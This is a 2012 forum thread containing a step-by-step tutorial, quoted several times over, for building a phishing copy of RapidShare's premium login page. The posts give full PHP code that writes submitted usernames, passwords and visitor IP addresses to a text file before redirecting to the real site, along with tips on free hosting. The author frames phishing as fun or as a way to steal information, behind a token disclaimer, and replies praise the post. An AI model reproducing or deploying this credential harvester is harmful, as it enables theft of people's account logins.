Post: TUTORIAL: How To Make A Phishing Site.
Options
06-07-2012, 06:29 PM
#1
HonuCinema
Maggbot timeout!
Definition Of Phishing:
Tutorial
1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.
2. Go to [url=https://www.rapidshare.com]RapidShare – Secure Data Logistics[/url] and navigate to the premium account log-in screen at the url : [url]https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi[/url]
3. We will now begin to make our phisher. Start by right clicking on the page and click view source.
4. Select all and paste into a notepad document.
5. You should see a bunch of random html coding, but we are only interested in two words: method and action.
6. Do a search in the document for the word "method" (without quotes).
7. Your result should be something like : method="post"
8. Change the word post to the word get.
9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.
10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"
11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"
12. Save this file as index.html and create a new document on notepad.
13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.
14. Copy and paste this code into the notepad document:
CODE
$datum = date('d-m-Y / H:i:s'
;
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:
CODE
$datum = date('d-m-Y / H:i:s';
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
16. Save this file as next.php and open up a new notepad document.
17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("password.txt", "a");
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.
18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.
19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.
Happy Phishing Guys!!!
(Sorry if its already been posted, I checked and didn't find it.)
The following 4 users say thank you to HonuCinema for this useful post:
06-07-2012, 07:58 PM
#11
fill0botto95
You talkin to me?
Originally posted by yakat
So, you think you know more about hacking than me? I would destroy you within a minute if I didn't want to see what type of a noob you are. And, for your information, phishing is for script kiddies with no potential skills whatsoever. I am new to this site, but I have been on hundreds of other hacking/coding websites and have been doing this stuff for years. So, would you kindly shut the F*** up.
I don't like your attidute.
The following user thanked fill0botto95 for this useful post:
06-07-2012, 08:00 PM
#12
yakat
Keeper
Originally posted by Fruity
You do that then, im just trying to contribute to the community, trying to teach people who dont know about it or how to do it, i am aware that many people know how to do this, but it's ment for people who have no comprehension of this what so ever.
I am a game designer, hacker, programmer, graphic designer, 3d model designer. I program in over 6 languages. I modify files and much more stuff. I am sorry if I offended you, I just hate to see posts like this,maybe I will be active and will be able to see some of your releases.
06-07-2012, 10:13 PM
#13
Epic?
Awe-Inspiring
Originally posted by yakat
I am a game designer, hacker, programmer, graphic designer, 3d model designer. I program in over 6 languages. I modify files and much more stuff. I am sorry if I offended you, I just hate to see posts like this,maybe I will be active and will be able to see some of your releases.
This is just a hypothesis, but I'm pretty sure you're a failtroll.
The following user thanked Epic? for this useful post:
06-07-2012, 10:27 PM
#14
Alexis Rhodes
#get rekt
06-08-2012, 04:44 AM
#15
HonuCinema
Maggbot timeout!
06-08-2012, 04:48 AM
#16
PacCityJr
Banned
Originally posted by Fruity
Hey, Whats Up Guys. This is a step by step tutorial on how to make a phishing page to get account information for various websites from many people. This is only how to make the page, but it is up to you to decide how you are going to get people to fall for it. Whether it be a fake E-Mail message, or PM over Another site. This can be very fun to mess with people, or if you are really looking to steal someones information. This is intended for educational purposes only and I am NOT responsible if you get in trouble. Good Luck.
Definition Of Phishing:
Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, You must login or register to view this content., and credit card details by masquerading as a trustworthy entity in an You must login or register to view this content.. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by You must login or register to view this content.You must login or register to view this content. or You must login or register to view this content.,[SUP]You must login or register to view this content.[/SUP] and it often directs users to enter details at a fake website whose You must login or register to view this content. are almost identical to the legitimate one. Phishing is an example of You must login or register to view this content. techniques used to deceive users,[SUP]You must login or register to view this content.[/SUP] and exploits the poor usability of current web security technologies.[SUP]You must login or register to view this content.[/SUP] Attempts to deal with the growing number of reported phishing incidents include You must login or register to view this content., user training, public awareness, and technical security measures.A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant offishing,[SUP]You must login or register to view this content.[/SUP] probably influenced by You must login or register to view this content.,[SUP]You must login or register to view this content.[/SUP][SUP]You must login or register to view this content.[/SUP] and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.
Tutorial
Happy Phishing Guys!!!
(Sorry if its already been posted, I checked and didn't find it.)
Definition Of Phishing:
Tutorial
1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.
2. Go to [url=https://www.rapidshare.com]RapidShare – Secure Data Logistics[/url] and navigate to the premium account log-in screen at the url : [url]https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi[/url]
3. We will now begin to make our phisher. Start by right clicking on the page and click view source.
4. Select all and paste into a notepad document.
5. You should see a bunch of random html coding, but we are only interested in two words: method and action.
6. Do a search in the document for the word "method" (without quotes).
7. Your result should be something like : method="post"
8. Change the word post to the word get.
9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.
10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"
11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"
12. Save this file as index.html and create a new document on notepad.
13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.
14. Copy and paste this code into the notepad document:
CODE
$datum = date('d-m-Y / H:i:s';
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:
CODE
$datum = date('d-m-Y / H:i:s';
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
16. Save this file as next.php and open up a new notepad document.
17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("password.txt", "a");
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.
18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.
19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.
Happy Phishing Guys!!!
(Sorry if its already been posted, I checked and didn't find it.)
Great Tutorial bro, keep it up!!
06-08-2012, 04:49 AM
#17
PacCityJr
Banned
Originally posted by Fruity
Hey, Whats Up Guys. This is a step by step tutorial on how to make a phishing page to get account information for various websites from many people. This is only how to make the page, but it is up to you to decide how you are going to get people to fall for it. Whether it be a fake E-Mail message, or PM over Another site. This can be very fun to mess with people, or if you are really looking to steal someones information. This is intended for educational purposes only and I am NOT responsible if you get in trouble. Good Luck.
Great Tutorial bro, keep it up!!
Great Tutorial bro, keep it up!!
06-08-2012, 04:52 AM
#18
HonuCinema
Maggbot timeout!
Copyright © 2026, NextGenUpdate.
All Rights Reserved.
